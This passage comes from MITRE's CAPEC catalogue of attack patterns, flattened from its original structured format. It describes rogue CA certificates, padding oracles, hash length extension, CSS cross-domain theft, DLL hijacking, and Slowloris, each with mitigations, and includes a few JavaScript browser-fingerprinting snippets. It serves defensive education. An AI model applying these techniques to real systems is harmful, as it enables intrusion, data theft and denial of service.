that the attackers' second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the attacker is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the attacker and of course any certificates that it signs. So the attacker is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec) . Certification Authority is using the MD5 hash function to generate the certificate hash to be signed Very High High Understanding of how to force an MD5 hash collision in X.509 certificates High An attacker must be able to craft two X.509 certificates that produce the same MD5 hash Medium Knowledge needed to set up a certification authority Certification Authorities need to stop using the weak collision prone MD5 hashing algorithm to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512. 327 Targeted 295 Targeted 290 Targeted 1000 Attack Pattern ChildOf 151 Alexander Sotirov Marc Stevens Jacob Appelbaum Arjen Lenstra David Molnar Dag Arne Osvik Benne de Weger MD5 Considered Harmful Today: Creating a Rogue CA Certificate Phreedom.org 2008-12-30 http://www.phreedom.org/research/rogue-ca/ Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The attacker crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow. The attacker modifies a tag or variable from a formatted configuration data. For instance she changes it to an oversized string. The target program consumes the data modified by the attacker without prior boundary checking. As a consequence, a buffer overflow occurs and at worst remote code execution may follow. The target program consumes user-controllable data in the form of tags or variables. The target program does not perform sufficient boundary checking. High High Injection Attack Example: Overflow Variables and Tags in MidiPlug A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag. CVE-1999-0946 Attack Example: Overflow Variables and Tags in Exim A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file. CVE-1999-0971 Low An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS. High Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level. An attacker can modify the variables and tag exposed by the target program. An attacker can automate the probing by input injection with script or automated tools. Use a language or compiler that performs automatic bounds checking. Use an abstraction library to abstract away risky APIs. Not a complete solution. Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Use OS-level preventative functionality. Not a complete solution. Do not trust input data from user. Validate all user input. Availability DoS: crash / exit / restart Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read memory Integrity Modify memory The variable or tag exposed to the user. The new value of the variable or tag (could be an oversized string). When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code. The most common is remote code execution. 120 Targeted 118 Targeted 119 Targeted 74 Targeted 20 Targeted 680 Targeted 733 Secondary 697 Targeted 1000 Attack Pattern ChildOf 100 1000 Attack Pattern PeerOf 8 1000 Attack Pattern PeerOf 10 Reluctance to trust Penetration Exploitation High High High All All All All C C++ G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html [R.46.1][REF-2] Cigital, Inc 2007-03-01 [R.46.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules. HTTP protocol is used with some GET/POST parameters passed Medium Any tool that enables intercepting and tampering with HTTP requests Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests Design: Perform URL encoding Implementation: Use strict regular expressions in URL rewriting Implementation: Beware of multiple occurrences of a parameter in a Query String 88 Targeted 147 Targeted 235 Targeted 1000 Attack Pattern ChildOf 137 Luca Carettoni Stefano di Paola HTTP Parameter Pollution OWASP EU09 Poland The Open Web Application Security Project (OWASP) 2008 https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2013-12-18 Updated Description Summary, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Solutions_and_Mitigations When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller when constructing a request would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. There is a practical attack against an authentication scheme of this nature that makes use of the hash function extension / padding weakness. Leveraging this weakness, an attacker, who does not know the secret token, is able to modify the parameters passed to the web service by generating their own call and still generate a legitimate signature hash. For instance, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) II M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, to compute the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work just as well with another hash function like SHA1. Web services check the signature of the API calls Authentication tokens / secrets are shared between the server and the legitimate client The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result. An iterative hash function like MD5 and SHA1 is used. An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message. The communication channel between the client and the server is not secured via channel security such as TLS High Medium Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding. Access to a function to produce a hash (e.g., MD5, SHA1) Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1 328 Targeted 290 Targeted 1000 Attack Pattern ChildOf 115 Thai Duong Juliano Rizzo Flickr's API Signature Forgery Vulnerability September 28, 2009 http://netifera.com/research/flickr_api_signature_forgery.pdf Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain. For GET requests an attacker could for instance leverage the "img" tag in conjunction with "onload() / onerror()" javascript events. For the POST requests, an attacker could leverage the "iframe" element and leverage the "onload()" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information. Ability to issue GET / POST requests cross domain Java Script is enabled in the victim's browser The victim has an active session with the site from which the attacker would like to receive information The victim's site does not protect search functionality with cross site request forgery (CSRF) protection Medium Low Some knowledge of Java Script Ability to issue GET / POST requests cross domain Design: The victim's site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests Design: The browser's security model could be fixed to not leak timing information for cross domain requests 385 Targeted 352 Secondary 1000 Category ChildOf 172 1000 Attack Pattern ChildOf 116 Chris Evans Cross-Domain Search Timing December 11, 2009 http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 MITRE Content Team MITRE 2013-06-21 Updated Summary CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary An attacker is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an attacker is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an attacker is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key. Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the attacker. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the attacker whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the attacker to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an attacker is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating. To do so an attacker sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the attacker is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). For instance, this can be done using "img" tag plus the onerror()/onload() events. The attacker's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not. The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext. The padding oracle remains available for enough time / for as many requests as needed for the attacker to decrypt the ciphertext. High Ability to detect instances where a target system is vulnerable to an oracle padding attack Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption. 209 Targeted 514 Targeted 649 Targeted 347 Targeted 354 Targeted 696 Targeted 1000 Attack Pattern ChildOf 116 1000 Attack Pattern Requires 97 Juliano Rizzo Thai Duong Practical Padding Oracle Attacks May 25, 2010 http://usenix.org/events/woot10/tech/full_papers/Rizzo.pdf Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 MITRE Content Team MITRE 2013-06-21 Updated Summary CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Resources_Required An attacker creates a very persistent cookie that is then sent by the server to the victim's browser when the victim visits a website. The cookie is stored on the victim's machine in over ten places to include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie's resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers. The victim's browser is not configured to reject all cookies The victim visits a website that serves the attackers' evercookie Medium Evercookie source code Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place. Design: Safari browser's private browsing mode is currently effective against evercookies. 359 Targeted 1000 Category ChildOf 118 Samy Kamkar Evercookie September 9, 2010 http://samy.pl/evercookie/ Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client. Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy. Transparent proxy is used Vulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy) Execution of malicious Flash or Applet in the victim's browser Medium Medium Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header. Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc. 441 Targeted 1000 Category ChildOf 210 Robert Auger Socket Capable Browser Plugins Result In Transparent Proxy Abuse 2009 http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 MITRE Content Team MITRE 2013-06-21 Updated Summary CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker leverages a man in the middle attack in order to bypass the same origin policy protection in the victim's browser. This active man in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS. For instance, the victim may be checking flight or weather information. When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active man in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in his or her browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim's request, an active man in the middle attacker intercepts these responses, injects his or her own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can essentially be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well. The victim and the attacker are both in an environment where an active man in the middle attack is possible (e.g., public WIFI hot spot) The victim visits at least one website that does not use TLS / SSL Medium Low Ability to intercept and modify requests / responses Medium Ability to create iFrame and JavaScript code that would initiate unauthorized requests to sensitive sites from the victim's browser Medium Solid understanding of the HTTP protocol Design: Tunnel communications through a secure proxy Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines) 300 Targeted 1000 Attack Pattern ChildOf 94 Roi Saltzman Adi Sharabani Active Man in the Middle Attacks IBM Rational Application Security Group February 2, 2009 http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 MITRE Content Team MITRE 2013-06-21 Updated Summary CAPEC Content Team MITRE 2014-02-06 Updated Description Summary Leveraging Active Man in the Middle Attacks to Bypass Single Origin Policy Leveraging Active Man in the Middle Attacks to Bypass Single Origin Policy An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the "remember me" feature to keep his or her session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing). In one example of an attack, an attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in his or her browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site. There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim. The victim has an active session with the social networking site. Low High An attacker should be able to create a payload and deliver it to the victim's browser. Medium An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker. Usage: Users should always explicitly log out from the social networking sites when done using them. Usage: Users should not open other tabs in the browser when using a social networking site. 352 Targeted 359 Targeted 1000 Attack Pattern ChildOf 62 1000 Attack Pattern ChildOf 408 Ronen Cross Site Identification - or - How your social network might expose you when you least expect it December 27, 2009 http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that "does not make sense". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens. No new lines can be present in the injected CSS string Proper HTML or URL escaping of the " and ' characters is not present The attacker has control of two injection points: pre-string and post-string Medium High Ability to craft a CSS injection Attacker controlled site / page to render a page referencing the injected CSS string Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix. Implementation: Perform proper HTML encoding and URL escaping 707 Targeted 149 Targeted 177 Targeted 838 Targeted 1000 Attack Pattern ChildOf 116 1000 Attack Pattern ChildOf 241 Chris Evans Generic cross-browser cross-domain theft December 28, 2009 http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted. HTTP protocol is used Web server used is vulnerable to denial of service via HTTP flooding Low Ability to issues hundreds of HTTP requests Configuration: Configure web server software to limit the waiting period on opened HTTP sessions Design: Use load balancing mechanisms 770 Targeted 772 Targeted 1000 Attack Pattern ChildOf 125 1000 Attack Pattern ChildOf 130 Robert Hansen Slowris HTTP DoS June 17, 2009 http://ha.ckers.org/blog/20090617/slowloris-http-dos/ Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2014-02-06 Updated Solutions_and_Mitigations In this attack, the target software is given input that the attacker knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow. Consider parts of the program where user supplied data may be expanded by the program. Use a disassembler and other reverse engineering tools to guide the search. Find a place where a buffer overflow occurs due to the fact that the new expanded size of the string is not correctly accounted for by the program. This may happen perhaps when the string is copied to another buffer that is big enough to hold the original, but not the expanded string. This may create an opportunity for planting the payload and redirecting program execution to the shell code. Write the buffer overflow exploit. To be exploitable, the "spill over" amount (e.g. the difference between the expanded string length and the original string length before it was expanded) needs to be sufficient to allow the overflow of the stack return pointer (in the case of a stack overflow), without causing a stack corruption that would crash the program before it gets to execute the shell code. Heap overflow will be more difficult and will require the attacker to get more lucky, by perhaps getting a chance to overwrite some of the accounting information stored as part of using malloc(). The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter. The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is). High Medium Injection Attack Example: FTP glob() The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob(). This buffer overflow occurs in memory that is dynamically allocated. It may be possible for attackers to exploit this vulnerability and execute arbitrary code on the affected host. To exploit this, the attacker must be able to create directories on the target host. The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote attacker can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the attacker must be able to create directories on the FTP server. [R.47.1][REF-2] CVE-2001-0249 Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion. The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer. CVE-2006-6652 High Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the attacker needs to write the shell code to accomplish his or her goals, but the attacker also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled attacker. Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful. Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system Confidentiality Access_Control Authorization Gain privileges / assume identity Availability DoS: crash / exit / restart Integrity Modify memory Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read memory 120 Targeted 119 Targeted 118 Targeted 130 Targeted 131 Targeted 74 Targeted 20 Secondary 680 Targeted 697 Targeted 1000 Attack Pattern ChildOf 100 Penetration Exploitation High High High All All All All C C++ G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.47.1][REF-2] Cigital, Inc 2007-03-01 [R.47.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc. A vulnerable DBMS is used A SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means Very High High Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection Configuration: Ensure that the DBMS is patched with the latest security patches Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user Usage: Do not use the DBMS machine for anything else other than the database Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host. Usage: Use an intrusion detection system to monitor network connections and logs on the database host. Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised 250 Targeted 89 Targeted 1000 Attack Pattern ChildOf 66 1000 Attack Pattern ChildOf 108 Bernardo Damele Assump ção Guimarães Advanced SQL Injection to Operating System Full Control April 10, 2009 http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Solutions_and_Mitigations The attacker exploits the functionality of the Windows DLL loader where the process loading the DLL searches for the DLL to be loaded first in the same directory in which the process binary resides and then in other directories (e.g., System32). Exploitation of this preferential search order can allow an attacker to make the loading process load the attackers' rogue DLL rather than the legitimate DLL. For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute. This attack can be leveraged with many different DLLs and with many different loading processes. No forensic trails are left in the system's registry or file system that an incorrect DLL had been loaded. Windows system is used Attacker has a mechanism to place its malicious DLLs in the needed location on the file system Medium Medium Ability to create a malicious DLL and get it to the right location on the victim's file system Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected Design: Sign system DLLs so that unauthorized DLLs can be detected. 427 Targeted 706 Targeted 1000 Attack Pattern ChildOf 251 1000 Attack Pattern ChildOf 38 1000 Attack Pattern ChildOf 159 M Trends Report Mandiant 2011 www.mandiant.com Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. The following code snippets can be used to detect various browsers: Javascript Firefox 2/3 FF=/a/[-1]=='a' Firefox 3 FF3=(function x(){})[-5]=='x' Firefox 2 FF2=(function x(){})[-6]=='x' IE IE='\v'=='v' Safari Saf=/a/.__proto__=='//' Chrome Chr=/source/.test((/a/.toString+'')) Opera Op=/^function \(/.test([].sort) Victim's browser visits a website that contains contains attacker's Java Script Java Script is not disabled in the victim's browser Low Configuration: Disable Java Script in the browser 200 Targeted 1000 Category ChildOf 224 1000 Attack Pattern ChildOf 116 Gareth Heyes Detecting browsers 